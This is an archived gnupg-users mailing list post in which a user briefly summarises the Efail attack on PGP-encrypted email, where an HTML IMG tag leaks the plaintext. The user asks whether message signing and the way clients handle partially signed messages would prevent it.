Efail

eira wahlin panina at nonbinary.me
Wed May 16 09:04:19 CEST 2018


Hi.
I've been looking at a vulnerability in mail clients using pgp, described at efail.de. It is a technique where an attacker would inject a HTML IMG tag in an email, enveloping the encrypted text. This would send the cleartext message to the server inticated in the IMG tag.

To me, it seems that this attack would be defeated by signing the encrypted message, which (to my knowledge) most email clients does by default.

Am I missing something here? How do clients generally handle partially signed messages? Would they decrypt an encrypted message, if  it would be enveloped in a cleartext IMG tag?

Panina, malmö, sweden
-- 
Sent from my Android device with K-9 Mail. Please excuse my brevity.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.gnupg.org/pipermail/gnupg-users/attachments/20180516/d0eea607/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 858 bytes
Desc: not available
URL: <https://lists.gnupg.org/pipermail/gnupg-users/attachments/20180516/d0eea607/attachment-0001.sig>


More information about the Gnupg-users mailing list